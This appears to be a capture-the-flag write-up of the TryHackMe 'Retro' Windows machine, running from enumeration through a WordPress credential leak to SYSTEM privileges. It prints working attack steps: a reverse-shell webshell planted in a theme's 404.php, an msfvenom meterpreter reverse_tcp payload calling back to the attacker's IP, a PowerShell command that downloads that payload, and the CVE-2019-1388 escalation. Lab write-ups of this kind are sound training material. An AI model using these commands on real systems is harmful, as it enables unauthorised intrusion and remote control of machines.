Disclaimers
The host penetrated by this article is legally authorized. The tools and methods used in this article are limited to learning and communication. Please do not use the tools and infiltration ideas used in this article for any illegal purpose. I will not bear any responsibility for all the consequences, nor be responsible for any misuse or damage.
Service discovery
┌──(root💀kali)-[~/tryhackme] └─# nmap -sV -Pn 10.10.10.216 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-05 05:03 EDT Nmap scan report for 10.10.10.216 Host is up (0.30s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 3389/tcp open ms-wbt-server Microsoft Terminal Services Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 32.16 seconds
There is only one 80 service and database
Blasting catalogue
┌──(root💀kali)-[~/dirsearch] └─# python3 dirsearch.py -e* -t 100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.216 _|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| ) Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 220545 Output File: /root/dirsearch/reports/10.10.10.216/_21-11-05_05-03-57.txt Error Log: /root/dirsearch/logs/errors-21-11-05_05-03-57.log Target: http://10.10.10.216/ [05:03:57] Starting: [05:04:35] 301 - 150B - /retro -> http://10.10.10.216/retro/
Scan a directory and browse it. It's a wordpress website
At this time, the enumeration is divided into two steps: one is to continue to explode the directory, and the other is to enumerate wp information by wpsscan
wp directory explosion
┌──(root💀kali)-[~/dirsearch] └─# python3 dirsearch.py -e* -t 100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.216/retro _|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| ) Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 220545 Output File: /root/dirsearch/reports/10.10.10.216/-retro_21-11-05_05-08-12.txt Error Log: /root/dirsearch/logs/errors-21-11-05_05-08-12.log Target: http://10.10.10.216/retro/ [05:08:14] Starting: [05:08:21] 301 - 161B - /retro/wp-content -> http://10.10.10.216/retro/wp-content/ [05:08:24] 301 - 162B - /retro/wp-includes -> http://10.10.10.216/retro/wp-includes/ [05:09:04] 301 - 159B - /retro/wp-admin -> http://10.10.10.216/retro/wp-admin/
There are three folders, and there is no file traversal vulnerability. It seems that there is no information to take advantage of
wp information enumeration
Confirm wp version: 5.2.1
└─# wpscan --url http://10.10.10.216/retro
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.14
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: http://10.10.10.216/retro/ [10.10.10.216]
[+] Started: Fri Nov 5 05:09:28 2021
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Microsoft-IIS/10.0
| - X-Powered-By: PHP/7.1.29
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.10.216/retro/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] WordPress readme found: http://10.10.10.216/retro/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.10.10.216/retro/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.2.1 identified (Insecure, released on 2019-05-21).
| Found By: Rss Generator (Passive Detection)
| - http://10.10.10.216/retro/index.php/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>
| - http://10.10.10.216/retro/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>
[+] WordPress theme in use: 90s-retro
| Location: http://10.10.10.216/retro/wp-content/themes/90s-retro/
| Latest Version: 1.4.10 (up to date)
| Last Updated: 2019-04-15T00:00:00.000Z
| Readme: http://10.10.10.216/retro/wp-content/themes/90s-retro/readme.txt
| Style URL: http://10.10.10.216/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1
| Style Name: 90s Retro
| Style URI: https://organicthemes.com/retro-theme/
| Description: Have you ever wished your WordPress blog looked like an old Geocities site from the 90s!? Probably n...
| Author: Organic Themes
| Author URI: https://organicthemes.com
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.4.10 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.10.216/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1, Match: 'Version: 1.4.10'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:12 <=============================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:12
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Nov 5 05:10:05 2021
[+] Requests Done: 170
[+] Cached Requests: 5
[+] Data Sent: 44.025 KB
[+] Data Received: 221.001 KB
[+] Memory used: 210.141 MB
[+] Elapsed time: 00:00:36
kali searches for vulnerabilities in this version wp
Show that sql injection exists
┌──(root💀kali)-[~] └─# searchsploit WordPress 5.2.1 ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts | multiple/webapps/47690.md WordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service | php/dos/47800.py WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities | php/webapps/39553.txt WordPress Plugin iThemes Security < 7.0.3 - SQL Injection | php/webapps/44943.txt WordPress Plugin Link Library 5.2.1 - SQL Injection | php/webapps/17887.txt WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection | php/webapps/48918.sh ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results
It shows that a plug-in has an injection vulnerability, but the plug-in does not exist in the wp tested, and wpscan does not sweep out the plug-in
On the home page, the author's name is wade. Use this account to try to log in to wp prompt
ERROR: The password you entered for the username wade is incorrect.
This means that the wade account does exist
We also prove the existence of Wade and wade by enumerating user names with wpscan
[+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:01:07 <============================================================================================================================================================> (200 / 200) 100.00% Time: 00:01:07 [i] User(s) Identified: [+] wade | Found By: Author Posts - Author Pattern (Passive Detection) | Confirmed By: | Wp Json Api (Aggressive Detection) | - http://10.10.10.216/retro/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] Wade | Found By: Rss Generator (Passive Detection) | Confirmed By: Login Error Messages (Aggressive Detection)
The prompt of user.txt is:
Don't leave sensitive information out in the open, even if you think you have control over it.
We assume that the author talks about information related to his password in public, perhaps hidden in a blog post
A mid-term article seems to reveal some information
Ready Player One by Wade I can't believe the movie based on my favorite book of all time is going to come out in a few days! Maybe it's because my name is so similar to the main character, but I honestly feel a deep connection to the main character Wade. I keep mistyping the name of his avatar whenever I log in but I think I'll eventually get it down. Either way, I'm really excited to see this movie!
Ready Player One is the number one player,
At least now we know that writers often confuse their names with the characters. The name of the protagonist of the film is wade
Under the comment of this post, the author disclosed his password parzival:
Wade December 9, 2019 Leaving myself a note here just in case I forget how to spell it: parzival
Initial shell
Because the system has opened 3389 service, use wade:parzival remote desktop to get user.txt from the target
xfreerdp /u:wade /v:10.10.10.216
At the same time, we can log in to wordpress with the above credentials
The penetration routine of wordpress is to edit the source code in appearance - > Theme Editor once you get the login account of the administrator
I usually write webshell to 404.php, and then visit a nonexistent page in the foreground to trigger the rebound shell
We put windows version reverse_shell Write 404.php and get webshell
┌──(root💀kali)-[~/tryhackme] └─# nc -nlvp 4242 listening on [any] 4242 ... connect to [10.13.21.169] from (UNKNOWN) [10.10.10.216] 49792 SOCKET: Shell has connected! PID: 3436 Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\inetpub\wwwroot\retro>whoami iis apppool\retro
We use msfvenom to generate a stable shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.13.21.169 LPORT=4444 -f exe > shell_64.exe
Upload to the target with webshell
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.13.21.169:8000/shel...','C:\users\public\Downloads\shell_64.exe')"
Download nc and wget to the target for subsequent penetration. After testing, C:\users\public\Downloads is writable:
On the remote desktop, click shell with wade's account_ 64.exe, received wade's rebound shell
msf6 exploit(windows/local/bypassuac_sdclt) > use exploit/multi/handler [*] Using configured payload windows/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST tun0 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.13.21.169:4444 [*] Sending stage (200262 bytes) to 10.10.10.216 [*] Meterpreter session 3 opened (10.13.21.169:4444 -> 10.10.10.216:50582) at 2021-11-22 05:48:04 -0500 meterpreter > getuid Server username: RETROWEB\Wade
Right raising
Tips on raising rights are:
Figure out what the user last was trying to find. Otherwise, put this one on ice and get yourself a better shell, perhaps one dipped in venom.
At first, I thought I was looking for historical commands in cmd or powershell, but I didn't get any results. Later, it was found that in the history of the browser, the author left a hint to find CVE-2019-1388
I found it on github this Right raising script.
The explanation on github is relatively simple. I'll follow it later This article The article detailing the principle of this vulnerability is raised to the system
Generally speaking, the principle of raising rights is the paragraph in the article:
When OID is a hyperlink, clicking this link will trigger consent.exe to open the browser with SYSTEM permission to access this link, and then the browser will have SYSTEM permission. By saving the browsing page, Microsoft's Explorer will pop up. Open cmd.exe program by mail in Explorer, and the SYSTEM permission of the browser will be inherited. Therefore, the promotion from ordinary users to NT AUTHORITY\SYSTEM users is completed!
Get root.txt on the Administrator desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 7443-948C
Directory of C:\Users\Administrator\Desktop
12/08/2019 08:06 PM <DIR> .
12/08/2019 08:06 PM <DIR> ..
12/08/2019 08:08 PM 32 root.txt.txt
1 File(s) 32 bytes
2 Dir(s) 30,362,959,872 bytes free